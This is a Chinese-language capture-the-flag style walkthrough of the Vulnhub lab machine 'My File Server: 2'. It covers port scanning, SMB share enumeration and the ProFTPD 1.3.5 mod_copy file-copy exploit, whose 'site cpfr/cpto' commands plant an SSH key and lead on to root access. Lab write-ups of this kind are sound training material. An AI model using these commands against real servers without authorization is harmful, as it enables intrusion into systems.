看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2
Vulnhub靶机My File Server: 2渗透测试详解
- Vulnhub靶机介绍:
- Vulnhub靶机下载:
- Vulnhub靶机安装:
- Vulnhub靶机漏洞详解:
- ①:信息收集:
- ②:FTP匿名登入
- ③:SSH私钥登入
- ④:SMB共享服务:
- ⑤:漏洞发现(ProFTPD 1.3.5):
- ⑥:漏洞利用:
- Vulnhub靶机渗透总结:
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
这是一个漏洞靶机,老样子需要找到flag即可。
Vulnhub靶机下载:
官方下载:https://download.vulnhub.com/myfileserver/My_file_server_2.ova
Vulnhub靶机安装:
下载好了把安装包解压 然后使用Oracle VM打开即可。
Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover
发现主机
渗透机:kali IP :192.168.0.104 靶机IP :192.168.0.103
使用命令:
nmap -sS -sV -A -n -p- 192.168.0.103
发现开启了很多端口 先使用工具老样子扫描80
端口 dirsearch
发现了一个readme.txt 得到一个密码:root/root1
②:FTP匿名登入
尝试FTP
登入 发现没有权限 尝试匿名发现里面也没有可以利用的信息。
③:SSH私钥登入
接着尝试SSH
登入失败,需要私钥才能登入!
④:SMB共享服务:
这里还有个文件共享服务Smb
先尝试使用smbmap
进行扫描查看文件,发现存在私钥文件 等下生成一个进行替换即可。
smbclient '\\192.168.159.187\smbdata' guest #登入smb
生成私钥:ssh-keygen
⑤:漏洞发现(ProFTPD 1.3.5):
这里还有个2121
端口 发现版本号为:ProFTPD 1.3.5
使用本地漏洞库searchsploit
搜一下看看有没有相关利用文件
⑥:漏洞利用:
发现存在文件复制漏洞尝试利用:
nc 192.168.0.103 2121
site cpfr /smbdata/authorized_keys
site cpto /home/smbuser/.ssh/authorized_keys # 一般服务创建时会同时建一个smbuser用户
直接ssh
登入smbuser
用户 su root
输入上面获取到的密码直接是root
权限了
至此获取到了flag,渗透测试结束。
Vulnhub靶机渗透总结:
这个靶机难度适中
1.信息收集 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster
2.smb
共享 smbmap
枚举(工具得使用)ssh私
钥登入
3.ProFTPD 1.3.5
文件复制漏洞利用
希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2相关推荐
- 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 1
Vulnhub靶机My File Server: 1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:FTP ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC1
Vulnhub靶机DC1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:漏洞利用: ④:S ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Vulnhub靶机DC7渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SSH登入: ③:漏洞发现与利用: ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)
Vulnhub靶机FunBox4(CTF)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:文件上传 Get ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox10(Under Construction)
Vulnhub靶机FunBox10(Under Construction)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①: ...
- 看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Venus
Vulnhub靶机The Planets:Venus渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:SSH ...
- 看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-2
Vulnhub靶机DriftingBlues-1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机漏洞详解: ①:信息收集: ②:暴力破解: ③:漏洞利用: ④:反弹 ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM)
Vulnhub靶机FunBox7(EASYENUM)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:文件上 ...
- 看完这篇 教你玩转渗透测试靶机vulnhub——FunBox5(NEXT LEVEL)
Vulnhub靶机FunBox5(NEXT LEVEL)渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:H ...
最新文章
- Android之TextView文字绘制流程
- 数据分析之Pandas(一)
- Pytorch中的variable, tensor与numpy相互转化
- 分享网页加载速度优化的一些技巧?
- UVa 264 - Count on Cantor
- Android 系统(210)----Android的.so文件你需要知道那些知识
- python抽学号程序_python:简单的学生管理系统
- 19-matlab知识点复习二
- linux Operation not permitted
- 两个表里数组字段的映射关联(stuff ,charindex,for xml path)
- Linux中利用NFS实现飞鸽传书
- Word Frequency(Leetcode192)
- gotoxy c语言,C语言中的gotoxy()到c++中变成什么了?
- 由简入难学习3d机械制图软件顺序?Pro/Engineer 与CREO有何不同。
- python如何进行双色球抽奖_Python趣味实例,实现一个简单的抽奖刮刮卡
- python判断信用卡号是否合法_怎么使用 Python 校验银行卡号码是否有效-阿里云开发者社区...
- 运动控制专题——PPU
- C# 实现对PPT插入、编辑、删除表格
- MobPush 创建推送
- 如何取消excel密码_Excel表格技巧—Excel表格如何取消密码